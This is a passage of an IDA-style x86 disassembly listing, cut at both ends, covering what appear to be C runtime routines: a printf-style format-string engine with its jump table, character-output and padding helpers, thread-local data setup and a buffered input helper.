lea eax, [ebp+arg_0]
push eax
push ebx
call sub_41A961
add esp, 0Ch
mov [ebp+arg_4], eax
loc_414BF2: ; CODE XREF: sub_414AFC+E0�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_414BFE
or dword ptr [esi+0Ch], 20h
jmp short loc_414C0E
; ---------------------------------------------------------------------------
loc_414BFE: ; CODE XREF: sub_414AFC+FA�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_414C11
; ---------------------------------------------------------------------------
loc_414C08: ; CODE XREF: sub_414AFC+10�j
; sub_414AFC+18�j ...
or eax, 20h
mov [esi+0Ch], eax
loc_414C0E: ; CODE XREF: sub_414AFC+100�j
or eax, 0FFFFFFFFh
loc_414C11: ; CODE XREF: sub_414AFC+10A�j
pop esi
pop ebx
pop ebp
retn
sub_414AFC endp
; =============== S U B R O U T I N E =======================================
sub_414C15 proc near ; CODE XREF: sub_414C48+11�p
; sub_414C6C+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_414C21
cmp dword ptr [ecx+8], 0
jz short loc_414C45
loc_414C21: ; CODE XREF: sub_414C15+4�j
dec dword ptr [ecx+4]
js short loc_414C31
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_414C3D
; ---------------------------------------------------------------------------
loc_414C31: ; CODE XREF: sub_414C15+F�j
movsx eax, al
push ecx
push eax
call sub_414AFC
pop ecx
pop ecx
loc_414C3D: ; CODE XREF: sub_414C15+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_414C45
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_414C45: ; CODE XREF: sub_414C15+A�j
; sub_414C15+2B�j
inc dword ptr [esi]
retn
sub_414C15 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414C48 proc near ; CODE XREF: sub_414CA3+6A2�p
; sub_414CA3+6CD�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_414C63
; ---------------------------------------------------------------------------
loc_414C50: ; CODE XREF: sub_414C48+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_414C15
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_414C69
loc_414C63: ; CODE XREF: sub_414C48+6�j
cmp [ebp+arg_4], 0
jg short loc_414C50
loc_414C69: ; CODE XREF: sub_414C48+19�j
pop esi
pop ebp
retn
sub_414C48 endp
; =============== S U B R O U T I N E =======================================
sub_414C6C proc near ; CODE XREF: sub_414CA3+6B6�p
; sub_414CA3+70E�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_414C99
cmp dword ptr [edi+8], 0
jnz short loc_414C99
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_414CA0
; ---------------------------------------------------------------------------
loc_414C86: ; CODE XREF: sub_414C6C+32�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_414C15
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_414CA0
loc_414C99: ; CODE XREF: sub_414C6C+A�j
; sub_414C6C+10�j
cmp [esp+8+arg_0], 0
jg short loc_414C86
loc_414CA0: ; CODE XREF: sub_414C6C+18�j
; sub_414C6C+2B�j
pop esi
pop ebx
retn
sub_414C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414CA3 proc near ; CODE XREF: sub_412BB5+2A�p
; sub_412E0D+29�p ...
var_254 = byte ptr -254h
var_55 = byte ptr -55h
var_54 = byte ptr -54h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
xor eax, eax
mov [ebp+var_14], eax
mov [ebp+var_18], eax
mov [ebp+var_2C], eax
mov eax, [ebp+arg_4]
mov bl, [eax]
xor ecx, ecx
test bl, bl
jz loc_415407
push esi
push edi
mov edi, eax
jmp short loc_414CDB
; ---------------------------------------------------------------------------
loc_414CD8: ; CODE XREF: sub_414CA3+75C�j
mov ecx, [ebp+var_38]
loc_414CDB: ; CODE XREF: sub_414CA3+33�j
inc edi
cmp [ebp+var_18], 0
mov [ebp+arg_4], edi
jl loc_415405
cmp bl, 20h
jl short loc_414D02
cmp bl, 78h
jg short loc_414D02
movsx eax, bl
movsx eax, byte ptr ds:stru_4277E0._unk[eax]
and eax, 0Fh
jmp short loc_414D04
; ---------------------------------------------------------------------------
loc_414D02: ; CODE XREF: sub_414CA3+49�j
; sub_414CA3+4E�j
xor eax, eax
loc_414D04: ; CODE XREF: sub_414CA3+5D�j
movsx eax, ds:byte_427800[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+var_38], eax
ja loc_4153F8 ; default
jmp ds:off_415418[eax*4] ; switch jump
loc_414D24: ; DATA XREF: .text:off_415418�o
xor eax, eax ; jumptable 00414D1D case 1
or [ebp+var_C], 0FFFFFFFFh
mov [ebp+var_3C], eax
mov [ebp+var_34], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_8], eax
mov [ebp+var_28], eax
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D41: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
movsx eax, bl ; jumptable 00414D1D case 2
sub eax, 20h
jz short loc_414D84
sub eax, 3
jz short loc_414D7B
sub eax, 8
jz short loc_414D72
dec eax
dec eax
jz short loc_414D69
sub eax, 3
jnz loc_4153F8 ; default
or [ebp+var_8], 8
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D69: ; CODE XREF: sub_414CA3+B2�j
or [ebp+var_8], 4
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D72: ; CODE XREF: sub_414CA3+AE�j
or [ebp+var_8], 1
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D7B: ; CODE XREF: sub_414CA3+A9�j
or byte ptr [ebp+var_8], 80h
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D84: ; CODE XREF: sub_414CA3+A4�j
or [ebp+var_8], 2
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D8D: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
cmp bl, 2Ah ; jumptable 00414D1D case 3
jnz short loc_414DB3
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_24], eax
jge loc_4153F8 ; default
or [ebp+var_8], 4
neg [ebp+var_24]
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414DB3: ; CODE XREF: sub_414CA3+ED�j
mov eax, [ebp+var_24]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_24], eax
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414DC8: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
and [ebp+var_C], 0 ; jumptable 00414D1D case 4
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414DD1: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
cmp bl, 2Ah ; jumptable 00414D1D case 5
jnz short loc_414DF4
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_C], eax
jge loc_4153F8 ; default
or [ebp+var_C], 0FFFFFFFFh
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414DF4: ; CODE XREF: sub_414CA3+131�j
mov eax, [ebp+var_C]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_C], eax
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E09: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
cmp bl, 49h ; jumptable 00414D1D case 6
jz short loc_414E3C
cmp bl, 68h
jz short loc_414E33
cmp bl, 6Ch
jz short loc_414E2A
cmp bl, 77h
jnz loc_4153F8 ; default
or byte ptr [ebp+var_8+1], 8
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E2A: ; CODE XREF: sub_414CA3+173�j
or [ebp+var_8], 10h
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E33: ; CODE XREF: sub_414CA3+16E�j
or [ebp+var_8], 20h
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E3C: ; CODE XREF: sub_414CA3+169�j
mov al, [edi]
cmp al, 36h
jnz short loc_414E56
cmp byte ptr [edi+1], 34h
jnz short loc_414E56
inc edi
inc edi
or byte ptr [ebp+var_8+1], 80h
mov [ebp+arg_4], edi
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E56: ; CODE XREF: sub_414CA3+19D�j
; sub_414CA3+1A3�j
cmp al, 33h
jnz short loc_414E6E
cmp byte ptr [edi+1], 32h
jnz short loc_414E6E
inc edi
inc edi
and byte ptr [ebp+var_8+1], 7Fh
mov [ebp+arg_4], edi
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E6E: ; CODE XREF: sub_414CA3+1B5�j
; sub_414CA3+1BB�j
cmp al, 64h
jz loc_4153F8 ; default
cmp al, 69h
jz loc_4153F8 ; default
cmp al, 6Fh
jz loc_4153F8 ; default
cmp al, 75h
jz loc_4153F8 ; default
cmp al, 78h
jz loc_4153F8 ; default
cmp al, 58h
jz loc_4153F8 ; default
and [ebp+var_38], 0
loc_414EA2: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
mov ecx, off_42CE30 ; jumptable 00414D1D case 0
and [ebp+var_28], 0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_414EC9
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_414C15
mov bl, [edi]
inc edi
mov [ebp+arg_4], edi
loc_414EC9: ; CODE XREF: sub_414CA3+211�j
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_414C15
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414EDB: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
movsx eax, bl ; jumptable 00414D1D case 7
cmp eax, 67h
jg loc_41512D
cmp eax, 65h
jge loc_414F70
cmp eax, 58h
jg loc_414FD1
jz loc_4151AE
sub eax, 43h
jz loc_414F93
dec eax
dec eax
jz short loc_414F66
dec eax
dec eax
jz short loc_414F66
sub eax, 0Ch
jnz loc_4152F6
test word ptr [ebp+var_8], 830h
jnz short loc_414F25
or byte ptr [ebp+var_8+1], 8
loc_414F25: ; CODE XREF: sub_414CA3+27C�j
; sub_414CA3+4A9�j
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnz short loc_414F32
mov ecx, 7FFFFFFFh
loc_414F32: ; CODE XREF: sub_414CA3+288�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
mov [ebp+var_10], eax
jz loc_415183
test eax, eax
jnz short loc_414F57
mov eax, off_42C74C
mov [ebp+var_10], eax
loc_414F57: ; CODE XREF: sub_414CA3+2AA�j
mov eax, [ebp+var_10]
mov [ebp+var_28], 1
jmp loc_415175
; ---------------------------------------------------------------------------
loc_414F66: ; CODE XREF: sub_414CA3+267�j
; sub_414CA3+26B�j
mov [ebp+var_3C], 1
add bl, 20h
loc_414F70: ; CODE XREF: sub_414CA3+247�j
or [ebp+var_8], 40h
cmp [ebp+var_C], 0
lea esi, [ebp+var_254]
mov [ebp+var_10], esi
jge loc_415077
mov [ebp+var_C], 6
jmp loc_4150BE
; ---------------------------------------------------------------------------
loc_414F93: ; CODE XREF: sub_414CA3+25F�j
test word ptr [ebp+var_8], 830h
jnz short loc_414F9F
or byte ptr [ebp+var_8+1], 8
loc_414F9F: ; CODE XREF: sub_414CA3+2F6�j
; sub_414CA3+336�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
jz short loc_415010
movsx eax, word ptr [eax-4]
push eax
lea eax, [ebp+var_254]
push eax
call sub_41AADA
test eax, eax
pop ecx
pop ecx
mov [ebp+var_14], eax
jge short loc_415020
mov [ebp+var_34], 1
jmp short loc_415020
; ---------------------------------------------------------------------------
loc_414FD1: ; CODE XREF: sub_414CA3+250�j
sub eax, 5Ah
jz short loc_41502E
sub eax, 9
jz short loc_414F9F
dec eax
jnz loc_4152F6
loc_414FE2: ; CODE XREF: sub_414CA3+48D�j
or [ebp+var_8], 40h
loc_414FE6: ; CODE XREF: sub_414CA3+4B1�j
mov [ebp+var_14], 0Ah
loc_414FED: ; CODE XREF: sub_414CA3+519�j
; sub_414CA3+532�j ...
mov ebx, [ebp+var_8]
mov esi, 8000h
test ebx, esi
jz loc_41521E
mov ecx, [ebp+arg_8]
mov eax, [ecx]
mov edx, [ecx+4]
add ecx, 8
mov [ebp+arg_8], ecx
jmp loc_415246
; ---------------------------------------------------------------------------
loc_415010: ; CODE XREF: sub_414CA3+309�j
mov al, [eax-4]
mov [ebp+var_254], al
mov [ebp+var_14], 1
loc_415020: ; CODE XREF: sub_414CA3+323�j
; sub_414CA3+32C�j
lea eax, [ebp+var_254]
mov [ebp+var_10], eax
jmp loc_4152F6
; ---------------------------------------------------------------------------
loc_41502E: ; CODE XREF: sub_414CA3+331�j
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
jz short loc_415069
mov ecx, [eax+4]
test ecx, ecx
jz short loc_415069
test byte ptr [ebp+var_8+1], 8
movsx eax, word ptr [eax]
mov [ebp+var_10], ecx
jz short loc_415060
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_28], 1
jmp loc_4152F3
; ---------------------------------------------------------------------------
loc_415060: ; CODE XREF: sub_414CA3+3AA�j
and [ebp+var_28], 0
jmp loc_4152F3
; ---------------------------------------------------------------------------
loc_415069: ; CODE XREF: sub_414CA3+397�j
; sub_414CA3+39E�j
mov eax, off_42C748
mov [ebp+var_10], eax
push eax
jmp loc_415122
; ---------------------------------------------------------------------------
loc_415077: ; CODE XREF: sub_414CA3+2DE�j
jnz short loc_415087
cmp bl, 67h
jnz short loc_4150BE
mov [ebp+var_C], 1
jmp short loc_4150BE
; ---------------------------------------------------------------------------
loc_415087: ; CODE XREF: sub_414CA3:loc_415077�j
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_415094
mov [ebp+var_C], eax
loc_415094: ; CODE XREF: sub_414CA3+3EC�j
mov edi, 0A3h
cmp [ebp+var_C], edi
jle short loc_4150BE
mov eax, [ebp+var_C]
add eax, 15Dh
push eax
call sub_41344D
test eax, eax
pop ecx
mov [ebp+var_2C], eax
jz short loc_4150BB
mov [ebp+var_10], eax
mov esi, eax
jmp short loc_4150BE
; ---------------------------------------------------------------------------
loc_4150BB: ; CODE XREF: sub_414CA3+40F�j
mov [ebp+var_C], edi
loc_4150BE: ; CODE XREF: sub_414CA3+2EB�j
; sub_414CA3+3D9�j ...
mov eax, [ebp+arg_8]
mov ecx, [eax]
push [ebp+var_3C]
add eax, 8
push [ebp+var_C]
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_48], eax
movsx eax, bl
push eax
lea eax, [ebp+var_4C]
push esi
push eax
mov [ebp+var_4C], ecx
call off_42CE18
mov edi, [ebp+var_8]
add esp, 14h
and edi, 80h
jz short loc_415103
cmp [ebp+var_C], 0
jnz short loc_415103
push esi
call off_42CE24
pop ecx
loc_415103: ; CODE XREF: sub_414CA3+450�j
; sub_414CA3+456�j
cmp bl, 67h
jnz short loc_415114
test edi, edi
jnz short loc_415114
push esi
call off_42CE1C
pop ecx
loc_415114: ; CODE XREF: sub_414CA3+463�j
; sub_414CA3+467�j
cmp byte ptr [esi], 2Dh
jnz short loc_415121
or byte ptr [ebp+var_8+1], 1
inc esi
mov [ebp+var_10], esi
loc_415121: ; CODE XREF: sub_414CA3+474�j
push esi
loc_415122: ; CODE XREF: sub_414CA3+3CF�j
call sub_416000
pop ecx
jmp loc_4152F3
; ---------------------------------------------------------------------------
loc_41512D: ; CODE XREF: sub_414CA3+23E�j
sub eax, 69h
jz loc_414FE2
sub eax, 5
jz loc_4151F4
dec eax
jz loc_4151DA
dec eax
jz short loc_4151A7
sub eax, 3
jz loc_414F25
dec eax
dec eax
jz loc_414FE6
sub eax, 3
jnz loc_4152F6
mov [ebp+var_30], 27h
jmp short loc_4151B1
; ---------------------------------------------------------------------------
loc_41516C: ; CODE XREF: sub_414CA3+4D4�j
dec ecx
cmp word ptr [eax], 0
jz short loc_415179
inc eax
inc eax
loc_415175: ; CODE XREF: sub_414CA3+2BE�j
test ecx, ecx
jnz short loc_41516C
loc_415179: ; CODE XREF: sub_414CA3+4CE�j
sub eax, [ebp+var_10]
sar eax, 1
jmp loc_4152F3
; ---------------------------------------------------------------------------
loc_415183: ; CODE XREF: sub_414CA3+2A2�j
test eax, eax
jnz short loc_41518F
mov eax, off_42C748
mov [ebp+var_10], eax
loc_41518F: ; CODE XREF: sub_414CA3+4E2�j
mov eax, [ebp+var_10]
jmp short loc_41519B
; ---------------------------------------------------------------------------
loc_415194: ; CODE XREF: sub_414CA3+4FA�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_41519F
inc eax
loc_41519B: ; CODE XREF: sub_414CA3+4EF�j
test ecx, ecx
jnz short loc_415194
loc_41519F: ; CODE XREF: sub_414CA3+4F5�j
sub eax, [ebp+var_10]
jmp loc_4152F3
; ---------------------------------------------------------------------------
loc_4151A7: ; CODE XREF: sub_414CA3+4A4�j
mov [ebp+var_C], 8
loc_4151AE: ; CODE XREF: sub_414CA3+256�j
mov [ebp+var_30], ecx
loc_4151B1: ; CODE XREF: sub_414CA3+4C7�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 10h
jz loc_414FED
mov al, byte ptr [ebp+var_30]
add al, 51h
mov [ebp+var_1C], 30h
mov [ebp+var_1B], al
mov [ebp+var_20], 2
jmp loc_414FED
; ---------------------------------------------------------------------------
loc_4151DA: ; CODE XREF: sub_414CA3+49D�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 8
jz loc_414FED
or byte ptr [ebp+var_8+1], 2
jmp loc_414FED
; ---------------------------------------------------------------------------
loc_4151F4: ; CODE XREF: sub_414CA3+496�j
add [ebp+arg_8], 4
test byte ptr [ebp+var_8], 20h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
jz short loc_41520D
mov cx, word ptr [ebp+var_18]
mov [eax], cx
jmp short loc_415212
; ---------------------------------------------------------------------------
loc_41520D: ; CODE XREF: sub_414CA3+55F�j
mov ecx, [ebp+var_18]
mov [eax], ecx
loc_415212: ; CODE XREF: sub_414CA3+568�j
mov [ebp+var_34], 1
jmp loc_4153E5
; ---------------------------------------------------------------------------
loc_41521E: ; CODE XREF: sub_414CA3+354�j
add [ebp+arg_8], 4
test bl, 20h
mov eax, [ebp+arg_8]
jz short loc_41523C
test bl, 40h
jz short loc_415236
movsx eax, word ptr [eax-4]
loc_415233: ; CODE XREF: sub_414CA3+597�j
; sub_414CA3+59F�j
cdq
jmp short loc_415246
; ---------------------------------------------------------------------------
loc_415236: ; CODE XREF: sub_414CA3+58A�j
movzx eax, word ptr [eax-4]
jmp short loc_415233
; ---------------------------------------------------------------------------
loc_41523C: ; CODE XREF: sub_414CA3+585�j
test bl, 40h
mov eax, [eax-4]
jnz short loc_415233
xor edx, edx
loc_415246: ; CODE XREF: sub_414CA3+368�j
; sub_414CA3+591�j
test bl, 40h
jz short loc_415260
test edx, edx
jg short loc_415260
jl short loc_415255
test eax, eax
jnb short loc_415260
loc_415255: ; CODE XREF: sub_414CA3+5AC�j
neg eax
adc edx, 0
neg edx
or byte ptr [ebp+var_8+1], 1
loc_415260: ; CODE XREF: sub_414CA3+5A6�j
; sub_414CA3+5AA�j ...
test [ebp+var_8], esi
mov ebx, eax
mov edi, edx
jnz short loc_41526B
xor edi, edi
loc_41526B: ; CODE XREF: sub_414CA3+5C4�j
cmp [ebp+var_C], 0
jge short loc_41527A
mov [ebp+var_C], 1
jmp short loc_41528B
; ---------------------------------------------------------------------------
loc_41527A: ; CODE XREF: sub_414CA3+5CC�j
and [ebp+var_8], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_41528B
mov [ebp+var_C], eax
loc_41528B: ; CODE XREF: sub_414CA3+5D5�j
; sub_414CA3+5E3�j
mov eax, ebx
or eax, edi
jnz short loc_415295
and [ebp+var_20], 0
loc_415295: ; CODE XREF: sub_414CA3+5EC�j
lea esi, [ebp+var_55]
loc_415298: ; CODE XREF: sub_414CA3+627�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jg short loc_4152A8
mov eax, ebx
or eax, edi
jz short loc_4152CC
loc_4152A8: ; CODE XREF: sub_414CA3+5FD�j
mov eax, [ebp+var_14]
cdq
push edx
push eax
push edi
push ebx
call sub_413500
add ecx, 30h
cmp ecx, 39h
mov [ebp+var_40], ebx
mov ebx, eax
mov edi, edx
jle short loc_4152C7
add ecx, [ebp+var_30]
loc_4152C7: ; CODE XREF: sub_414CA3+61F�j
mov [esi], cl
dec esi
jmp short loc_415298
; ---------------------------------------------------------------------------
loc_4152CC: ; CODE XREF: sub_414CA3+603�j
lea eax, [ebp+var_55]
sub eax, esi
inc esi
test byte ptr [ebp+var_8+1], 2
mov [ebp+var_14], eax
mov [ebp+var_10], esi
jz short loc_4152F6
mov ecx, esi
cmp byte ptr [ecx], 30h
jnz short loc_4152E9
test eax, eax
jnz short loc_4152F6
loc_4152E9: ; CODE XREF: sub_414CA3+640�j
dec [ebp+var_10]
mov ecx, [ebp+var_10]
mov byte ptr [ecx], 30h
inc eax
loc_4152F3: ; CODE XREF: sub_414CA3+3B8�j
; sub_414CA3+3C1�j ...
mov [ebp+var_14], eax
loc_4152F6: ; CODE XREF: sub_414CA3+270�j
; sub_414CA3+339�j ...
cmp [ebp+var_34], 0
jnz loc_4153E5
mov ebx, [ebp+var_8]
test bl, 40h
jz short loc_41532E
test bh, 1
jz short loc_415313
mov [ebp+var_1C], 2Dh
jmp short loc_415327
; ---------------------------------------------------------------------------
loc_415313: ; CODE XREF: sub_414CA3+668�j
test bl, 1
jz short loc_41531E
mov [ebp+var_1C], 2Bh
jmp short loc_415327
; ---------------------------------------------------------------------------
loc_41531E: ; CODE XREF: sub_414CA3+673�j
test bl, 2
jz short loc_41532E
mov [ebp+var_1C], 20h
loc_415327: ; CODE XREF: sub_414CA3+66E�j
; sub_414CA3+679�j
mov [ebp+var_20], 1
loc_41532E: ; CODE XREF: sub_414CA3+663�j
; sub_414CA3+67E�j
mov esi, [ebp+var_24]
sub esi, [ebp+var_20]
sub esi, [ebp+var_14]
test bl, 0Ch
jnz short loc_41534D
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_414C48
add esp, 0Ch
loc_41534D: ; CODE XREF: sub_414CA3+697�j
push [ebp+var_20]
mov edi, [ebp+arg_0]
lea eax, [ebp+var_18]
lea ecx, [ebp+var_1C]
call sub_414C6C
test bl, 8
pop ecx
jz short loc_415378
test bl, 4
jnz short loc_415378
push edi
push esi
push 30h
lea eax, [ebp+var_18]
call sub_414C48
add esp, 0Ch
loc_415378: ; CODE XREF: sub_414CA3+6BF�j
; sub_414CA3+6C4�j
cmp [ebp+var_28], 0
jz short loc_4153BF
cmp [ebp+var_14], 0
jle short loc_4153BF
mov eax, [ebp+var_14]
mov ebx, [ebp+var_10]
mov [ebp+var_40], eax
loc_41538D: ; CODE XREF: sub_414CA3+718�j
dec [ebp+var_40]
xor eax, eax
mov ax, [ebx]
push eax
lea eax, [ebp+var_54]
push eax
call sub_41AADA
inc ebx
pop ecx
inc ebx
test eax, eax
pop ecx
jle short loc_4153CE
mov edi, [ebp+arg_0]
push eax
lea eax, [ebp+var_18]
lea ecx, [ebp+var_54]
call sub_414C6C
cmp [ebp+var_40], 0
pop ecx
jnz short loc_41538D
jmp short loc_4153CE
; ---------------------------------------------------------------------------
loc_4153BF: ; CODE XREF: sub_414CA3+6D9�j
; sub_414CA3+6DF�j
push [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ebp+var_18]
call sub_414C6C
pop ecx
loc_4153CE: ; CODE XREF: sub_414CA3+702�j
; sub_414CA3+71A�j
test byte ptr [ebp+var_8], 4
jz short loc_4153E5
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_414C48
add esp, 0Ch
loc_4153E5: ; CODE XREF: sub_414CA3+576�j
; sub_414CA3+657�j ...
cmp [ebp+var_2C], 0
jz short loc_4153F8 ; default
push [ebp+var_2C]
call sub_412FE4
and [ebp+var_2C], 0
pop ecx
loc_4153F8: ; CODE XREF: sub_414CA3+74�j
; sub_414CA3+99�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
test bl, bl
jnz loc_414CD8
loc_415405: ; CODE XREF: sub_414CA3+40�j
pop edi
pop esi
loc_415407: ; CODE XREF: sub_414CA3+29�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+var_18]
pop ebx
call sub_4182D6
leave
retn
sub_414CA3 endp
; ---------------------------------------------------------------------------
off_415418 dd offset loc_414EA2 ; DATA XREF: sub_414CA3+7A�r
dd offset loc_414D24 ; jump table for switch statement
dd offset loc_414D41
dd offset loc_414D8D
dd offset loc_414DC8
dd offset loc_414DD1
dd offset loc_414E09
dd offset loc_414EDB
; =============== S U B R O U T I N E =======================================
sub_415438 proc near ; CODE XREF: sub_4154C7:loc_4154E0�p
; sub_4154C7:loc_41552D�p
call sub_416818
mov eax, dword_42C750
cmp eax, 0FFFFFFFFh
jz short locret_415455
push eax
call ds:dword_41F150
or dword_42C750, 0FFFFFFFFh
locret_415455: ; CODE XREF: sub_415438+D�j
retn
sub_415438 endp
; =============== S U B R O U T I N E =======================================
sub_415456 proc near ; CODE XREF: sub_412D64�p sub_412D71�p ...
push ebx
push esi
call ds:dword_41F008
push dword_42C750
mov ebx, eax
call ds:dword_41F160
mov esi, eax
test esi, esi
jnz short loc_4154BB
push 88h
push 1
call sub_41AB01
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_4154B3
push esi
push dword_42C750
call ds:dword_41F15C
test eax, eax
jz short loc_4154B3
mov dword ptr [esi+54h], offset dword_42CFE0
mov dword ptr [esi+14h], 1
call ds:dword_41F158
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_4154BB
; ---------------------------------------------------------------------------
loc_4154B3: ; CODE XREF: sub_415456+2E�j
; sub_415456+3F�j
push 10h
call sub_4148E1
pop ecx
loc_4154BB: ; CODE XREF: sub_415456+1A�j
; sub_415456+5B�j
push ebx
call ds:dword_41F154
mov eax, esi
pop esi
pop ebx
retn
sub_415456 endp
; =============== S U B R O U T I N E =======================================
sub_4154C7 proc near ; CODE XREF: .text:loc_414A05�p
call sub_4167CF
test eax, eax
jz short loc_4154E0
call ds:dword_41F164
cmp eax, 0FFFFFFFFh
mov dword_42C750, eax
jnz short loc_4154E8
loc_4154E0: ; CODE XREF: sub_4154C7+7�j
call sub_415438
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4154E8: ; CODE XREF: sub_4154C7+17�j
push esi
push 88h
push 1
call sub_41AB01
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_41552D
push esi
push dword_42C750
call ds:dword_41F15C
test eax, eax
jz short loc_41552D
mov dword ptr [esi+54h], offset dword_42CFE0
mov dword ptr [esi+14h], 1
call ds:dword_41F158
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41552D: ; CODE XREF: sub_4154C7+34�j
; sub_4154C7+45�j
call sub_415438
xor eax, eax
pop esi
retn
sub_4154C7 endp
; =============== S U B R O U T I N E =======================================
sub_415536 proc near ; CODE XREF: sub_41554C+52�p
; sub_41554C+1EF�p ...
dec dword ptr [edx+4]
js short loc_415544
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_415544: ; CODE XREF: sub_415536+3�j
push edx
call sub_417455
pop ecx
retn
sub_415536 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41554C proc near ; CODE XREF: sub_412D93+2A�p
var_1D8 = word ptr -1D8h
var_1D4 = byte ptr -1D4h
var_1D3 = byte ptr -1D3h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = byte ptr -1C8h
var_1C7 = byte ptr -1C7h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
